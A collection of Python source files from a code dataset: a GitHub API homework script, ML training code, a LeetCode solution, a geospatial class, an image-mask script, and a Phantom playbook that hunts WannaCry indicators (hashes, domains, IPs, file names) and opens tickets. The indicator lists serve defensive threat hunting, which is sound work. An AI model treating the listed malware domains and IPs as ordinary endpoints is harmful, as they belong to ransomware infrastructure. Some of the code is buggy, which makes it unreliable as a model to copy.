Список репозиториев какого пользователя вы бы хотели посмотреть?')\r\nusername = input()\r\n\r\nif username not in UserList: \r\n print ('Выберите, пожалуйста, кого-то из этого списка:elmiram,maryszmary, lizaku, nevmenandr, ancatmara, roctbb, akutuzov,agricolamz, lehkost, kylepjohnson, mikekestemont, demidovakatya, shwars,JelteF, timgraham, arogozhnikov, jasny, bcongdon, whyisjake, gvanrossum') \r\n\r\n \r\nurl = 'https://api.github.com/users/%s/repos' % username \r\n\r\n\r\nresponse = urllib.request.urlopen(url) \r\ntext = response.read().decode('utf-8') \r\ndata= json.loads(text)\r\n\r\n\r\nprint('У этого пользователя' + ' ' + str(len(data))+ ' ' + 'репозиториев.')\r\n\r\n\r\ndef repos(data):\r\n for i in data:\r\n print(\"Такой: \" + i[\"name\"])\r\nrepos(data)\r\n\r\ndef description(data):\r\n for i in data:\r\n print(\"Описание:\" + str(i[\"description\"]))\r\ndescription(data)\r\n\r\n\r\ndef languages(data):\r\n dict_lang = {}\r\n for i in data:\r\n new_1 = i['language']\r\n if new_1 in dict_lang:\r\n dict_lang[new_1]+=1\r\n else:\r\n dict_lang[new_1] = 1\r\n for lang in dict_lang.keys():\r\n print(lang, dict_lang[lang])\r\nlanguages(data)\r\n","sub_path":"hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405608845","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport math\nimport paddle\n\nfrom paddle.optimizer.lr import LRScheduler\nfrom .builder import LRSCHEDULERS, build_lr_scheduler\nclass CosinLinearWarmup(LRScheduler):\n def __init__(self,\n learning_rate,\n T_max,\n warmup_steps,\n start_lr,\n end_lr,\n last_epoch=-1,\n verbose=False):\n type_check = isinstance(learning_rate, float) or isinstance(\n learning_rate, int) or isinstance(learning_rate, LRScheduler)\n if not type_check:\n raise TypeError(\n \"the type of learning_rate should be [int, float or LRScheduler], the current type is {}\".\n format(learning_rate))\n self.learning_rate = learning_rate\n self.T_max = T_max\n self.warmup_steps = warmup_steps\n self.start_lr = start_lr\n self.end_lr = end_lr\n assert end_lr > start_lr, \"end_lr {} must be greater than start_lr {}\".format(\n end_lr, start_lr)\n super(CosinLinearWarmup, self).__init__(start_lr, last_epoch, verbose)\n\n def state_dict(self):\n \"\"\"\n Returns the state of the LinearWarmup scheduler as a :class:`dict`.\n\n It is a subset of ``self.__dict__`` .\n \"\"\"\n state_dict = super(CosinLinearWarmup, self).state_dict()\n if isinstance(self.learning_rate, LRScheduler):\n state_dict[\"LinearWarmup_LR\"] = self.learning_rate.state_dict()\n return state_dict\n\n def set_state_dict(self, state_dict):\n \"\"\"\n Loads state_dict for LinearWarmup scheduler.\n \"\"\"\n super(CosinLinearWarmup, self).set_state_dict(state_dict)\n if isinstance(self.learning_rate, LRScheduler):\n self.learning_rate.set_state_dict(state_dict[\"LinearWarmup_LR\"])\n\n def 
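The language tally at the end of the `hw2.py` record above builds its dictionary by hand; `collections.Counter` collapses the loop to one expression. A sketch against the same GitHub `/users/{user}/repos` response shape:

```python
import json
import urllib.request
from collections import Counter

def language_counts(username):
    url = 'https://api.github.com/users/%s/repos' % username
    with urllib.request.urlopen(url) as response:
        repos = json.loads(response.read().decode('utf-8'))
    return Counter(repo['language'] for repo in repos)
```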
get_lr(self):\n if self.last_epoch < self.warmup_steps:\n return (self.end_lr - self.start_lr) * float(\n self.last_epoch) / float(self.warmup_steps) + self.start_lr\n else:\n if isinstance(self.learning_rate, LRScheduler):\n lr_value = self.learning_rate()\n self.learning_rate.step()\n return lr_value\n return self.learning_rate * 0.5 * (1 + math.cos(math.pi * (self.last_epoch-self.warmup_steps) / self.T_max))\n\n\n\n\nclass ByolLRScheduler(CosinLinearWarmup):\n def __init__(self,total_image,total_batch,total_steps,warmup_steps,start_lr,end_lr,last_epoch=-1,verbose=False):\n total_steps = total_steps * total_image // total_batch\n warmup_steps = warmup_steps * total_image // total_batch\n T_max = total_steps - warmup_steps\n super(CosinWarmup, self).__init__(end_lr,T_max,warmup_steps,start_lr,end_lr,last_epoch=-1,verbose=False)\n","sub_path":"passl/solver/byol_lr_scheduler.py","file_name":"byol_lr_scheduler.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"581494157","text":"from keras.layers import LSTM\nimport numpy as np\nimport cPickle\nimport os\nfrom keras.models import Sequential\nimport data_loader as dl\nfrom keras.layers import Dense\nfrom keras.layers import Masking\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.preprocessing.sequence import pad_sequences\n\nresults_dir = os.environ.get('MINF_RESULTS_DIR')\n\nnp.random.seed(42)\n\ndata = dl.DataLoader()\n\nX, Y, m = data.load()\n\nX_pad = pad_sequences(X, maxlen=m, padding='post')\nY_pad = pad_sequences(Y, maxlen=m, padding='post')\n\nnp.random.shuffle(X_pad)\nnp.random.shuffle(Y_pad)\n\nsample_weights = np.ones((273, m))\nfor i in xrange(273):\n for j in xrange(m):\n if (X_pad[i][j] == np.zeros(12)).all():\n sample_weights[i][j] = 0\n\nmodel = Sequential()\naccuracies = dict()\n# Just do once, can't be bothered removing loop\nfor i in [1]:\n mask = np.zeros(12)\n model.add(Masking(mask_value=mask, input_shape=(m, 12)))\n model.add(LSTM(100, return_sequences=True, dropout_W=0.4, dropout_U=0.4))\n model.add(TimeDistributed(Dense(12, activation=\"softmax\")))\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n sample_weight_mode='temporal')\n X_train, X_test = X_pad[:136, :], X_pad[136:, :]\n Y_train, Y_test = Y_pad[:136, :], Y_pad[136:, :]\n sample_weights_train, sample_weights_test = sample_weights[:136, :], sample_weights[136:, :]\n # # for custom metrics\n # def weighted_accuracy(y_true, y_pred):\n # score_array *= sample_weights\n # score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))\n\n def weighted_accuracy(y_true, y_pred):\n # Only for testing\n # score_array = K.equal(K.argmax(y_true, axis=-1),\n # K.argmax(y_pred, axis=-1))\n # score_array *= weights\n # score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))\n # return K.mean(score_array)\n total = 0.0\n count = 0.0\n for i, y_i in enumerate(y_true):\n for j, y_ij in enumerate(y_i):\n if sum(y_ij) > 0:\n total += y_ij[y_pred[i][j]]\n count += 1\n return total / count\n history = model.fit(X_train, Y_train, batch_size=136, nb_epoch=500, sample_weight=sample_weights_train)\n Y_prediction = model.predict_classes(X_test, batch_size=5)\n acc = weighted_accuracy(Y_test, Y_prediction), history.history\n\n with open(os.path.join(results_dir, 'LSTM-shuffle-gpu.pkl'), 'w') as f:\n cPickle.dump(acc, 
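Two notes on the `byol_lr_scheduler.py` record above: `ByolLRScheduler.__init__` calls `super(CosinWarmup, self)` on a name that is never defined (presumably `CosinLinearWarmup` was meant, so the class would raise `NameError` as written), and stripped of the framework plumbing the schedule is simply linear warmup into cosine decay. The same curve as a plain function (a sketch):

```python
import math

def warmup_cosine_lr(step, warmup_steps, total_steps, start_lr, end_lr):
    # Linear ramp from start_lr to end_lr, then cosine decay back toward 0.
    if step < warmup_steps:
        return start_lr + (end_lr - start_lr) * step / warmup_steps
    t_max = total_steps - warmup_steps
    return end_lr * 0.5 * (1.0 + math.cos(math.pi * (step - warmup_steps) / t_max))
```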
f)\n","sub_path":"src/seq2seq/wjazz/LSTM-shuffle.py","file_name":"LSTM-shuffle.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"609609483","text":"'''\nA tree is an undirected graph in which any two vertices are connected by exactly one path. In other words, any connected graph without simple cycles is a tree.\n\nGiven a tree of n nodes labelled from 0 to n - 1, and an array of n - 1 edges where edges[i] = [ai, bi] indicates that there is an undirected edge between the two nodes ai and bi in the tree, you can choose any node of the tree as the root. When you select a node x as the root, the result tree has height h. Among all possible rooted trees, those with minimum height (i.e. min(h)) are called minimum height trees (MHTs).\n\nReturn a list of all MHTs' root labels. You can return the answer in any order.\n\nThe height of a rooted tree is the number of edges on the longest downward path between the root and a leaf.\n\n \n\nExample 1:\n\n\nInput: n = 4, edges = [[1,0],[1,2],[1,3]]\nOutput: [1]\nExplanation: As shown, the height of the tree is 1 when the root is the node with label 1 which is the only MHT.\nExample 2:\n\n\nInput: n = 6, edges = [[3,0],[3,1],[3,2],[3,4],[5,4]]\nOutput: [3,4]\n'''\nfrom typing import List\nfrom collections import defaultdict\nclass Solution:\n #reversed bfs by level order, remove all leaves by level till last one or two nodes \n def findMinHeightTrees(self, n: int, edges: List[List[int]]) -> List[int]:\n if n == 1:\n return [0]\n adj = defaultdict(set)\n for a, b in edges:\n adj[a].add(b)\n adj[b].add(a)\n leaves = [node for node, neighbours in adj.items() if len(neighbours) == 1]\n while len(adj) > 2:\n next_leaves = []\n for leaf in leaves:\n parent = adj[leaf].pop()\n del adj[leaf]\n adj[parent].remove(leaf)\n if len(adj[parent]) == 1:\n next_leaves.append(parent)\n leaves = next_leaves\n return leaves\n\nimport unittest\nfunctions = [Solution().__getattribute__(f) for f in dir(Solution()) if not f.startswith('__')]\nclass Test(unittest.TestCase): \n def test1(self):\n for f in functions:\n self.assertEqual(f(n = 2, edges = [[1,0]]), [1,0], f.__name__)\n def test2(self):\n for f in functions:\n self.assertEqual(f(n = 3, edges = [[0,1],[0,2]]), [0], f.__name__)\n def test3(self):\n for f in functions:\n self.assertEqual(f(n = 4, edges = [[1,0],[1,2],[1,3]]), [1], f.__name__)\n def test4(self):\n for f in functions:\n self.assertEqual(f(n = 6, edges = [[3,0],[3,1],[3,2],[3,4],[5,4]]), [3,4], f.__name__)\nunittest.main()","sub_path":"leetcode/LC310. Minimum Height Trees.py","file_name":"LC310. 
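One caveat about the `LSTM-shuffle.py` record above: it calls `np.random.shuffle` on `X_pad` and `Y_pad` separately, which permutes inputs and targets independently and silently breaks their pairing. Shuffling both arrays through one shared permutation keeps the rows aligned (a sketch):

```python
import numpy as np

def paired_shuffle(X, Y, seed=42):
    rng = np.random.default_rng(seed)
    perm = rng.permutation(len(X))  # one permutation applied to both arrays
    return X[perm], Y[perm]
```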
Minimum Height Trees.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"540159970","text":"\"\"\"\nHunt for wannacry IOCs (maintained in an external custom list) file, domain, and IP indicators in network and create tickets.\n\"\"\"\n\nimport phantom.rules as phantom\nimport json\nfrom datetime import datetime, timedelta\ndef on_start(container):\n phantom.debug('on_start() called')\n\n domains = phantom.datastore_get('wannacry_domains')\n if len(domains) == 0:\n phantom.datastore_set('wannacry_domains',\n [ 'iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com',\n 'Rphjmrpwmfv6v2e.onion',\n 'Gx7ekbenv2riucmf.onion',\n '57g7spgrzlojinas.onion',\n 'xxlvbrloxvriy2c5.onion',\n '76jdd2ir2embyv47.onion',\n 'cwwnhwhlz52maqm7.onion',\n ] )\n\n hashes = phantom.datastore_get('wannacry_hashes')\n if len(hashes) == 0:\n phantom.datastore_set('wannacry_hashes', \n [ 'dff26a9a44baa3ce109b8df41ae0a301d9e4a28ad7bd7721bbb7ccd137bfd696',\n '201f42080e1c989774d05d5b127a8cd4b4781f1956b78df7c01112436c89b2c9',\n 'ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa',\n 'c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9',\n '09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa',\n 'b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25',\n 'aae9536875784fe6e55357900519f97fee0a56d6780860779a36f06765243d56',\n '21ed253b796f63b9e95b4e426a82303dfac5bf8062bfe669995bde2208b360fd',\n '2372862afaa8e8720bc46f93cb27a9b12646a7cbc952cc732b8f5df7aebb2450',\n '24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c',\n 'f8812f1deb8001f3b7672b6fc85640ecb123bc2304b563728e6235ccbe782d85',\n '4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79',\n '4b76e54de0243274f97430b26624c44694fbde3289ed81a160e0754ab9f56f32',\n '9cc32c94ce7dc6e48f86704625b6cdc0fda0d2cd7ad769e4d0bb1776903e5a13',\n '78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df',\n 'be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844',\n '5d26835be2cf4f08f2beeff301c06d05035d0a9ec3afacc71dff22813595c0b9',\n '76a3666ce9119295104bb69ee7af3f2845d23f40ba48ace7987f79b06312bbdf',\n 'fc626fe1e0f4d77b34851a8c60cdd11172472da3b9325bfe288ac8342f6c710a',\n 'eeb9cd6a1c4b3949b2ff3134a77d6736b35977f951b9c7c911483b5caeb1c1fb',\n '043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2',\n '57c12d8573d2f3883a8a0ba14e3eec02ac1c61dee6b675b6c0d16e221c3777f4',\n 'ca29de1dc8817868c93e54b09f557fe14e40083c0955294df5bd91f52ba469c8',\n 'f7c7b5e4b051ea5bd0017803f40af13bed224c4b0fd60b890b6784df5bd63494',\n '3e6de9e2baacf930949647c399818e7a2caea2626df6a468407854aaa515eed9',\n '9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640',\n '5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec',\n '24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c',\n '12d67c587e114d8dde56324741a8f04fb50cc3160653769b8015bc5aec64d20b',\n '85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186',\n '3f3a9dde96ec4107f67b0559b4e95f5f1bca1ec6cb204bfe5fea0230845e8301',\n 'aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c',\n ] )\n\n file_names = phantom.datastore_get('wannacry_file_names')\n if len(file_names) == 0:\n phantom.datastore_set('wannacry_file_names', \n [ '@Please_Read_Me@.txt',\n '@WanaDecryptor@.exe',\n '@WanaDecryptor@.exe.lnk',\n 'Please Read Me!.txt',\n 'tasksche.exe',\n 'qeriuwjhrf',\n '131181494299235.bat',\n '176641494574290.bat',\n 
'217201494590800.bat',\n '!WannaDecryptor!.exe.lnk',\n '00000000.pky',\n '00000000.eky',\n '00000000.res',\n 'taskdl.exe',\n ] )\n\n ip_addrs = phantom.datastore_get('wannacry_ip_addrs')\n if len(ip_addrs) == 0:\n phantom.datastore_set('wannacry_ip_addrs', \n [ '197.231.221.221',\n '128.31.0.39',\n '149.202.160.69',\n '46.101.166.19',\n '91.121.65.179',\n '2.3.69.209',\n '146.0.32.144',\n '50.7.161.218',\n '217.79.179.177',\n '213.61.66.116',\n '212.47.232.237',\n '81.30.158.223',\n '79.172.193.32',\n '38.229.72.16',\n ] )\n\n # call 'hunt_file_1' block\n hunt_file_1(container=container)\n\n # call 'list_endpoints_1' block\n list_endpoints_1(container=container)\n\n return\n\ndef filter_7(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('filter_7() called')\n\n # collect filtered artifact ids for 'if' condition 1\n matched_artifacts_1, matched_results_1 = phantom.condition(\n container=container,\n action_results=results,\n conditions=[\n [\"list_endpoints_1:action_result.data.*.ips\", \"not in\", \"custom_list:wannacry_infected_endpoints\"],\n ],\n name=\"filter_7:condition_1\")\n\n # call connected blocks if filtered artifacts or results\n if matched_artifacts_1 or matched_results_1:\n list_connections_1(action=action, success=success, container=container, results=results, handle=handle, custom_function=custom_function, filtered_artifacts=matched_artifacts_1, filtered_results=matched_results_1)\n\n return\n\ndef create_ticket_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('create_ticket_1() called')\n \n #phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n \n # collect data for 'create_ticket_1' call\n formatted_data_1 = phantom.get_format_data(name='format_ticket_description')\n\n parameters = []\n \n # build parameters list for 'create_ticket_1' call\n parameters.append({\n 'table': \"incident\",\n 'fields': \"\",\n 'vault_id': \"\",\n 'description': formatted_data_1,\n 'short_description': \"Wanna Cry Hunting Campaign Result\",\n })\n\n phantom.act(action=\"create ticket\", parameters=parameters, assets=['servicenow'], name=\"create_ticket_1\")\n\n return\n\ndef list_connections_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('list_connections_1() called')\n \n #phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n \n # collect data for 'list_connections_1' call\n results_data_1 = phantom.collect2(container=container, datapath=['list_endpoints_1:action_result.data.*.ips', 'list_endpoints_1:action_result.parameter.context.artifact_id'], action_results=results)\n\n parameters = []\n \n # build parameters list for 'list_connections_1' call\n for results_item_1 in results_data_1:\n parameters.append({\n 'pid': \"\",\n 'ip_hostname': results_item_1[0],\n 'process_name': \"\",\n 'carbonblack_process_id': \"\",\n # context (artifact id) is added to associate results with the artifact\n 'context': {'artifact_id': results_item_1[1]},\n })\n\n phantom.act(action=\"list connections\", parameters=parameters, assets=['carbonblack'], callback=filter_matching_IP, name=\"list_connections_1\")\n\n return\n\ndef list_endpoints_1(action=None, success=None, 
container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('list_endpoints_1() called')\n\n parameters = []\n\n phantom.act(action=\"list endpoints\", parameters=parameters, assets=['carbonblack'], callback=filter_7, name=\"list_endpoints_1\")\n\n return\n\ndef get_system_info_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('get_system_info_1() called')\n \n #phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n \n # collect data for 'get_system_info_1' call\n results_data_1 = phantom.collect2(container=container, datapath=['hunt_file_1:action_result.data.*.process.results.*.sensor_id', 'hunt_file_1:action_result.parameter.context.artifact_id'], action_results=results)\n\n parameters = []\n \n # build parameters list for 'get_system_info_1' call\n for results_item_1 in results_data_1:\n parameters.append({\n 'sensor_id': results_item_1[0],\n 'ip_hostname': \"\",\n # context (artifact id) is added to associate results with the artifact\n 'context': {'artifact_id': results_item_1[1]},\n })\n\n phantom.act(action=\"get system info\", parameters=parameters, assets=['carbonblack'], callback=filter_6, name=\"get_system_info_1\", parent_action=action)\n\n return\n\ndef hunt_file_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('hunt_file_1() called')\n\n # get custom list for wannacry_hashes\n cl_wannacry_hashes = phantom.datastore_get('wannacry_hashes')\n\n parameters = []\n \n # build parameters list for 'hunt_file_1' call\n for wannacry_hash in cl_wannacry_hashes:\n if wannacry_hash:\n parameters.append({\n 'hash': wannacry_hash,\n 'range': \"\",\n 'type': \"\",\n })\n\n phantom.act(\"hunt file\", parameters=parameters, assets=['carbonblack'], callback=get_system_info_1, name=\"hunt_file_1\") \n \n return\n\ndef filter_matching_IP(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('filter_matching_IP() called')\n\n # collect filtered artifact ids for 'if' condition 1\n matched_artifacts_1, matched_results_1 = phantom.condition(\n container=container,\n action_results=results,\n conditions=[\n [\"list_connections_1:action_result.data.*.ip_addr\", \"in\", \"custom_list:wannacry_ip_addrs\"],\n ],\n name=\"filter_matching_IP:condition_1\")\n\n # call connected blocks if filtered artifacts or results\n if matched_artifacts_1 or matched_results_1:\n join_format_ticket_description(action=action, success=success, container=container, results=results, handle=handle, custom_function=custom_function, filtered_artifacts=matched_artifacts_1, filtered_results=matched_results_1)\n\n return\n\ndef filter_6(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('filter_6() called')\n\n # collect filtered artifact ids for 'if' condition 1\n matched_artifacts_1, matched_results_1 = phantom.condition(\n container=container,\n action_results=results,\n conditions=[\n [\"get_system_info_1:action_result.data.*.ips\", \"not in\", \"custom_list:wannacry_infected_endpoints\"],\n ],\n name=\"filter_6:condition_1\")\n\n # call connected 
blocks if filtered artifacts or results\n if matched_artifacts_1 or matched_results_1:\n join_format_ticket_description(action=action, success=success, container=container, results=results, handle=handle, custom_function=custom_function, filtered_artifacts=matched_artifacts_1, filtered_results=matched_results_1)\n\n return\n\n\"\"\"\nList the IP addresses and file hashes in a formatted paragraph for the ticket description.\n\"\"\"\ndef format_ticket_description(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('format_ticket_description() called')\n \n template = \"\"\"The following endpoints have active connections with IP addresses associated with wannacry: \n{0}\n\nThe following endpoints have a wannacry fileHash present on their system: \n{1}\"\"\"\n\n # parameter list for template variable replacement\n parameters = [\n \"filtered-data:filter_matching_IP:condition_1:list_connections_1:action_result.data.*.hostname\",\n \"hunt_file_1:action_result.data.*.process.results.*.hostname\",\n ]\n\n phantom.format(container=container, template=template, parameters=parameters, name=\"format_ticket_description\")\n\n create_ticket_1(container=container)\n\n return\n\ndef join_format_ticket_description(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None):\n phantom.debug('join_format_ticket_description() called')\n\n # check if all connected incoming playbooks, actions, or custom functions are done i.e. have succeeded or failed\n if phantom.completed(action_names=['list_connections_1', 'get_system_info_1']):\n \n # call connected block \"format_ticket_description\"\n format_ticket_description(container=container, handle=handle)\n \n return\n\ndef on_finish(container, summary):\n phantom.debug('on_finish() called')\n # This function is called after all actions are completed.\n # summary of all the action and/or all details of actions\n # can be collected here.\n\n # summary_json = phantom.get_summary()\n # if 'result' in summary_json:\n # for action_result in summary_json['result']:\n # if 'action_run_id' in action_result:\n # action_results = phantom.get_action_results(action_run_id=action_result['action_run_id'], result_data=False, flatten=False)\n # phantom.debug(action_results)\n\n return","sub_path":"wannacry_hunting.py","file_name":"wannacry_hunting.py","file_ext":"py","file_size_in_byte":15442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"339076635","text":"from descarteslabs import scenes\n\nfrom ...cereal import serializable\nfrom ..core import typecheck_promote\nfrom ..primitives import Str, Int, Float, Bool\nfrom ..containers import Tuple, Struct\n\nfrom .geometry import Geometry\n\nGeoContextBase = Struct[\n {\n \"geometry\": Geometry,\n \"resolution\": Float,\n \"crs\": Str,\n \"align_pixels\": Bool,\n \"bounds\": Tuple[Float, Float, Float, Float],\n \"bounds_crs\": Str,\n \"arr_shape\": Tuple[Int, Int],\n \"gdal_geotrans\": Tuple[\n Float, Float, Float, Float, Float, Float\n ], # 'a', 'b', 'c', 'd', 'e', 'f'\n \"projected_bounds\": Tuple[Float, Float, Float, Float],\n }\n]\n\n\n@serializable(is_named_concrete_type=True)\nclass GeoContext(GeoContextBase):\n _constructor = \"GeoContext.create\"\n _optional = {\n \"geometry\",\n \"resolution\",\n \"crs\",\n \"align_pixels\",\n \"bounds\",\n \"bounds_crs\",\n }\n _read_only = 
{\"arr_shape\", \"gdal_geotrans\", \"projected_bounds\"}\n\n _doc = {\n \"geometry\": \"\"\"\\\n Clip data to this `Geometry` (like a cutline).\n\n Coordinates must be WGS84 (lat-lon).\n If ``None``, data will just be clipped to `bounds`.\n \"\"\",\n \"resolution\": \"\"\"\\\n Distance, in units of the `crs`, that the edge of each pixel represents on the ground.\n \"\"\",\n \"crs\": \"\"\"\\\n Coordinate reference system into which data will be projected,\n expressed as an EPSG code (like ``EPSG:4326``) or a PROJ.4 definition.\n \"\"\",\n \"align_pixels\": \"\"\"\\\n Snap the `bounds` to whole-number intervals of ``resolution``, ensuring non-fractional pixels.\n\n Imagine the bounds overlayed on on a grid of ``resolution`` (say, 30m) intervals.\n ``align_pixels`` expands the bounds outward to the next grid lines.\n \"\"\",\n \"bounds\": \"\"\"\\\n Clip data to these ``(min_x, min_y, max_x, max_y)`` bounds,\n expressed in the coordinate reference system in `bounds_crs`.\n\n If `bounds_crs` and `crs` differ, the actual bounds will be the envelope\n of the rectangle defined by `bounds`, when reprojected into `crs`.\n \"\"\",\n \"bounds_crs\": \"\"\"\\\n The coordinate reference system of the `bounds`,\n expressed as an EPSG code (like ``EPSG:4326``) or a PROJ.4 definition.\n \"\"\",\n \"arr_shape\": \"\"\"\\\n ``(height, width)`` (i.e. ``(rows, cols)``) of the array this `GeoContext` will produce.\n\n This derived property (computed from `projected_bounds`, `resolution`, and `align_pixels`)\n cannot be set in ``__init__``, but you can call `compute` on it\n (useful for uploading to `.Catalog`).\n \"\"\",\n \"gdal_geotrans\": \"\"\"\\\n The 6-element GDAL geotrans this `GeoContext` will use.\n\n This tuple is in the form ``(a, b, c, d, e, f)``, where:\n\n * ``a``: top left pixel's x-coordinate\n * ``b``: west-east pixel resolution\n * ``c``: row rotation; always 0 for `GeoContext`\n * ``d``: top left pixel's y-coordinate\n * ``e``: column rotation; always 0 for `GeoContext`\n * ``f``: north-south pixel resolution, always a negative value\n\n This derived property (computed from `projected_bounds`, `resolution`, and `align_pixels`)\n cannot be set in ``__init__``, but you can call `compute` on it\n (useful for uploading to `.Catalog`).\n \"\"\",\n \"projected_bounds\": \"\"\"\\\n The actual bounds (in units of `crs`), if the `bounds_crs` convenience is used.\n\n This is the *envelope* of the four corners defined by `bounds`,\n when those corners are reprojected from `bounds_crs` into `crs`.\n\n This derived property cannot be set in ``__init__``, but you can call `compute` on it\n (useful for uploading to `.Catalog`).\n \"\"\",\n }\n\n @classmethod\n @typecheck_promote(Str)\n def from_dltile_key(cls, key):\n return cls._from_apply(\"GeoContext.from_dltile_key\", key)\n\n @classmethod\n @typecheck_promote(Int, Int, Int)\n def from_xyz_tile(cls, x, y, z):\n return cls._from_apply(\"GeoContext.from_xyz_tile\", x, y, z)\n\n @classmethod\n def from_scenes(cls, ctx):\n \"\"\"\n Construct a Workflows GeoContext from a Scenes GeoContext\n\n Parameters\n ----------\n ctx: ~descarteslabs.scenes.AOI, ~descarteslabs.scenes.DLTile, or ~descarteslabs.scenes.XYZTile\n\n Returns\n -------\n ~descarteslabs.workflows.GeoContext\n \"\"\"\n if isinstance(ctx, scenes.AOI):\n if ctx.shape is not None:\n raise ValueError(\"AOI shape is not supported.\")\n return cls(\n geometry=ctx.geometry,\n resolution=float(ctx.resolution),\n # ^ often given as an int, but we're stricter here\n crs=ctx.crs,\n 
align_pixels=ctx.align_pixels,\n bounds=ctx.bounds,\n bounds_crs=ctx.bounds_crs,\n )\n elif isinstance(ctx, scenes.DLTile):\n return cls.from_dltile_key(ctx.key)\n elif isinstance(ctx, scenes.XYZTile):\n return cls.from_xyz_tile(ctx.x, ctx.y, ctx.z)\n else:\n raise TypeError(\n \"In GeoContext.from_scenes, expected a `descarteslabs.scenes.GeoContext` \"\n \"but got {}\".format(ctx)\n )\n\n @classmethod\n def _promote(cls, obj):\n if isinstance(obj, scenes.GeoContext):\n return cls.from_scenes(obj)\n else:\n return super(GeoContext, cls)._promote(obj)\n","sub_path":"descarteslabs/workflows/types/geospatial/geocontext.py","file_name":"geocontext.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"251791339","text":"import os\n\nfrom skimage import io, data, color\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom cv2 import imread\n#\n# # configuration\n# config = dict()\n# config['image_dir_index'] = 2\n# config['dir_index'] = 0 # 0 or 1, original or processed\n# config['modality_index'] = 1 # 0-4\n# config['slice_number'] = 101\n#\n# image_dir_list = ['Sagittal_1', 'Coronal_2', 'Transverse_3']\n# modalities = ['t1', 't1ce', 'flair', 't2']\n\nimage_dir = 'PNG'\n\nimage = color.rgb2gray(io.imread(image_dir + '/processed/t1ce/101.png'))\n# image = imread(os.path.join(image_dir + '/processed/t1ce/101.png'))\n# image = imread(os.path.join(image_dir + '/processed/t2/101.png'))\nmask = imread(os.path.join(image_dir + '/processed/truth/101.png'))\n\n\ndef get_whole_tumor_mask(data):\n return data > 0\n\n\ndef get_tumor_core_mask(data):\n return np.logical_or(data == 1, data == 4)\n\n\ndef get_enhancing_tumor_mask(data):\n return data == 4\n\n\ndef draw_mask_skimage():\n # image_dir = image_dir_list[image_dir_index] # 0-2\n # modality = modalities[modality_index] # 0-4\n #\n # mask_overlap_path = os.path.join(image_dir + '/mask_overlap')\n # if not os.path.exists(mask_overlap_path):\n # os.mkdir(mask_overlap_path)\n #\n # mask_original_path = os.path.join(mask_overlap_path + '/original')\n # if not os.path.exists(mask_original_path):\n # os.mkdir(mask_original_path)\n #\n # mask_processed_path = os.path.join(mask_overlap_path + '/processed')\n # if not os.path.exists(mask_processed_path):\n # 